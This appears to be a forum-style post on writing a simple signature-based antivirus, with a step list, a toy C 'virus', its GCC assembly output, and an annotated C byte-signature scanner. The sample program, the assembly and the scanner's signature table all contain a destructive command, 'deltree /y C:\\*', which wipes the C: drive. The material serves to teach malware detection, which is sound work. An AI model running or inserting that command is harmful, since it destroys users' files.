1. Analyse virus code (plenty on hacking sites):
Code:
#include <stdio.h>
#include <stdlib.h>   /* system() is declared here; the post's listing left this include out */

int main()
{
    /* the only thing this sample does is hand a destructive shell command to system() */
    system("deltree /y C:\\*");
    return 0;
}
2. Code a disassembler (or use an open-source one)
3. Disassemble executables with it (above program, I just used gcc's -S option to get this but you get the idea):
Code:
        .file   "test.c"
        .section .rodata
.LC0:
        .string "deltree /y C:\\*"
        .text
.globl main
        .type   main, @function
main:
        leal    4(%esp), %ecx
        andl    $-16, %esp
        pushl   -4(%ecx)
        pushl   %ebp
        movl    %esp, %ebp
        pushl   %ecx
        subl    $4, %esp
        movl    $.LC0, (%esp)
        call    system
        movl    $0, %eax
        addl    $4, %esp
        popl    %ecx
        popl    %ebp
        leal    -4(%ecx), %esp
        ret
        .size   main, .-main
        .ident  "GCC: (Ubuntu 4.3.3-5ubuntu4) 4.3.3"
        .section .note.GNU-stack,"",@progbits
5. Make your anti-virus read the disassembled output and figure out dangerous code (e.g. in the program above, when you read "deltree /y C:\\*" you know it's a virus)
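Step 5 boils down to a byte-signature scanner: look for known dangerous content in the compiled file. The following is an added example of such a scanner, not code from the post; the signature table is constructed here from the string the sample program passes to system(). It also shows the technique's main weakness: a program that assembles the same command from fragments at run time never matches.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not from the post): a minimal byte-signature scanner of the
   kind step 5 sketches. The signature table is constructed for illustration. */
typedef struct {
    const char *name;
    const unsigned char *pattern;
    size_t len;
} signature_t;

/* Constructed signature: the command string the post's sample program hands to
   system(); in the compiled binary it sits in .rodata as a NUL-terminated literal. */
static const unsigned char SIG_DELTREE[] = "deltree /y C:\\*";
static const signature_t SIGNATURES[] = {
    { "deltree-wipe", SIG_DELTREE, sizeof(SIG_DELTREE) - 1 },
};
#define NSIGS (sizeof(SIGNATURES) / sizeof(SIGNATURES[0]))

/* Scan raw bytes; return the index of the first matching signature or -1.
   memcmp over a sliding window is used because strstr would stop at the first
   NUL byte, and executables are full of them. */
int scan_buffer(const unsigned char *buf, size_t len) {
    for (size_t s = 0; s < NSIGS; s++) {
        size_t plen = SIGNATURES[s].len;
        if (plen == 0 || plen > len) continue;
        for (size_t i = 0; i + plen <= len; i++)
            if (memcmp(buf + i, SIGNATURES[s].pattern, plen) == 0)
                return (int)s;
    }
    return -1;
}

/* Scan a whole file (e.g. the compiled sample program).
   Returns a signature index, -1 if nothing matched, -2 on I/O error. */
int scan_file(const char *path) {
    FILE *f = fopen(path, "rb");
    if (!f) return -2;
    if (fseek(f, 0, SEEK_END) != 0) { fclose(f); return -2; }
    long size = ftell(f);
    if (size < 0) { fclose(f); return -2; }
    rewind(f);
    unsigned char *buf = malloc(size > 0 ? (size_t)size : 1);
    if (!buf) { fclose(f); return -2; }
    size_t n = fread(buf, 1, (size_t)size, f);
    fclose(f);
    int hit = scan_buffer(buf, n);
    free(buf);
    return hit;
}
```

Run scan_file() on the compiled test.c and the .rodata literal is found; a buffer where the same command is stored as two separate fragments returns -1, which is why real engines pair signatures with behavioural checks rather than relying on string matches alone.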